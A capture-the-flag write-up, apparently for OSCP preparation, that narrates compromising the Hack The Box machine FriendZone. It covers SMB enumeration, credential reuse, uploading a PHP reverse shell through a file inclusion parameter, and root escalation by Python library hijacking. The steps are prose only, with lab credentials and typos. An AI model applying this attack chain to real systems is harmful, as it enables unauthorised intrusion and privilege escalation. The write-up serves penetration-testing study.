OSCP PREPROTİONS – HTB  FriendZone

FriendZone machine is a vulnerable machine with Linux operating system among Retired machines. We are expected to obtain user and root flags using these vulnerabilities.
We perform a network scan on the target machine.


Classic Scan

Full port scan

21/tcp ftp, 22/tcp ssh, 53/tcp domain, 80/tcp http, 139/tcp netbios-ssn, 443/tcp https, 445/tcp microsoft-ds, 53/udp domain, 137/udp netbios-ns, 138/udp |filtered netbios-dgm ports are open.

Since SMB ports 445 and 139 are open, we will perform an SMB scan.

On the scan server
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
Shared files have been detected.
To see which files are inside these directories, we looked using the -R parameter

We saw the creds.txt file under the general directory and we will use the smbclient tool to get this file.
Smbclient is used to connect to target directories. Using smbclient we connected to the target directory and extracted the creds.txt file.

Let’s read the contents of Creds.txt

admin:WORKWORKHhallelujah@#
We try this credential information we obtained in FTP, SSH and SMB in order, but we could not provide a login, we make a note of it and continue.
Our next open port is hhtp, we open it via browser to provide enumeration on this port.

We looked at the source code and in developer mode and found no valuable information.
Let’s go through the browser to look at the https protocol

We can’t access it, let’s look at the certificakte part here.

Here we see friendzone.red, let’s see which ip’s it is connected to with the host command

With the host command
administrator1.friendzone.red. 604800 IN A 127.0.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.0.1
To access them, let’s specify their paths in the /etc/hosts file.

Now let’s go to the domains we have detected respectively
friendzone.red

hr.friendzone.red

 uploads.friendzone.red

administrator1.friendzone.red

This login section immediately attracted our attention, we try to log in with the credential information we have obtained in smb.
We were able to log in successfully.

It tells us to go to /dashboard.php page, let’s go now

default is image_id=a.jpg&pagename=timestamp parameter in the url section.
Let’s enter and try.

Here we examine the image of the page.

We understand that images are stored in the /images directory.

We were able to see jpg files a and b. We had an uplaod subdomain here, we say that we can come here to the files we uploaded, let’s upload our shell file

Immediately we go to the images section again and we realized that no file was uploaded

We will try to get Shell in another way.
We go to https://administrator1.friendzone.red page again. We thought that we could access the pages from the pagename = timestamp section that exists here, we had write authorization in the Development directory that we detected in the smb scan before, here we will upload the shell and run the shell through the page parameter and get authorization.
We uploaded our php revershell that we received from Pentest monkey to the other side with the put command using smbclient

Now let’s use netcat to listen back and try to access your file

We got our shell with www-data authorization
We searched and found our user flag with locatekomutu.

We went to access the root directory and got a permission denied error.
Let’s provide authorization escalation enumuration steps

We install linpeas.sh on the target machine and start enumuration.

At the end of the enumratioon, the mysql configurasoyon file draws our attention and when we examine it with the cat command, we can see the crendential information in it.

db_user=friend
db_pass=Agpyu12!0.213$
Let’s use the crendtial information we obtained in the form of crendtial information for user change

We have become the Friend user and we are performing enumeration work to become root through this user.
We run linpeas.sh located in the tmp directory.

As a result of the enumuration, we did not get a successful result. Let’s install and run the pspy tool on the target machine in case we can get authorization elevation from running processes.

Here reporter.py draws our attention.
Let’s look at the file

Let’s look at the contents of Reporter.py;

Here we have a situation related to mail forwarding, here we will apply python library privilege escalation management. (https://rastating.github.io/privilege-escalation-via-python-library-hijacking/)

Here we find the os library
Inside we will add the command to give us revershell

After making the necessary edits, we are waiting for the scheduled reporter.py file to run with ncat
After running Reporter.py, we get root authorization and get our root flag.